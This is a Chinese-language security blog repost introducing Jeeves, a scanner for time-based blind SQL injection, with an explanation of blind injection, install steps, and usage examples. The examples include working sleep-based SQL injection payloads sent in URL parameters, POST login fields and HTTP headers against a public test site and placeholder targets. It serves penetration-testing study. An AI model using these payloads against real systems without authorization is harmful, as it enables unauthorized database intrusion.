一款功能强大的SQL注入漏洞扫描工具

admin 2022年7月2日15:26:52评论284 views字数 2868阅读9分33秒阅读模式

Jeeves是一款功能强大的SQL注入漏洞扫描工具,在该工具的帮助下,广大研究人员可以轻松通过网络侦查等方式来寻找目标应用程序中潜在的基于时间的SQL盲注漏洞。

关于盲注

盲注分为两类:

1、布尔盲注:布尔很明显Ture跟Fales,也就是说它只会根据我们的注入信息返回Ture跟False,也就没有了之前的报错信息。

2、时间盲注:界面返回值只有一种,即Ture。也就是说,无论输入任何值,返回情况都会按正常的来处理。加入特定的时间函数之后,我们将能够通过查看Web页面返回的时间差来判断注入的语句是否正确。

 

安装和要求:

安装 Jeeves💀

$ go install github.com/ferreiraklet/Jeeves@latest

或者

$ git clone https://github.com/ferreiraklet/Jeeves.git$ cd Jeeves$ go build jeeves.go$ chmod +x jeeves$ ./jeeves -h

用法和说明:

在您的侦察过程中,您可能会发现易受 sql 注入攻击的端点,例如:https ://redacted.com/index.php?id=1

单个网址

echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_timeecho "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10

在 --payload-time 中,您必须使用有效负载中提到的时间

从列表

cat targets | jeeves --payload-time 5

添加标题

注意语法!必须相同 =>

echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"

使用代理

echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port"echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"


代理 + 标头 =>

echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"

发布请求

通过发布请求发送数据(登录表单等)

注意语法!必须相等!->

echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx"echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"

另一种使用方式

您可以将 Jeeves 与其他工具一起使用,例如 gau、gauplus、waybackurls、qsreplace 和 bhedak,掌握他的优势

命令行标志

 Usage: -t, --payload-time,  The time from payload -p, --proxy          Send traffic to a proxy -c                   Set Concurrency, Default 25 -H, --headers        Custom Headers -d, --data           Sending Post request with data -h                   Show This Help Message

与 sql 有效负载一起使用 wordlist

cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done

在标头中测试

echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10
Payload credit: https://github.com/rohit0x5

OBS:

  • 不遵循重定向,如果状态码不同于 200,则返回“需要手动分析”

  • Jeeves 不进行 http 探测,他无法对不包含协议 ( http://, https:// ) 的 url 进行请求


项目地址

Jeeves:https://github.com/ferreiraklet/Jeeves

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

@

学习更多渗透技能!体验靶场实战练习

一款功能强大的SQL注入漏洞扫描工具

hack视频资料及工具

一款功能强大的SQL注入漏洞扫描工具

(部分展示)


往期推荐

【精选】SRC快速入门+上分小秘籍+实战指南

爬取免费代理,拥有自己的代理池

漏洞挖掘|密码找回中的套路

渗透测试岗位面试题(重点:渗透思路)

漏洞挖掘 | 通用型漏洞挖掘思路技巧

干货|列了几种均能过安全狗的方法!

一名大学生的黑客成长史到入狱的自述

攻防演练|红队手段之将蓝队逼到关站!

巧用FOFA挖到你的第一个漏洞


看到这里了,点个“赞”、“再看”吧

原文始发于微信公众号(白帽子左一):一款功能强大的SQL注入漏洞扫描工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月2日15:26:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一款功能强大的SQL注入漏洞扫描工具http://cn-sec.com/archives/1151469.html

发表评论

匿名网友 填写信息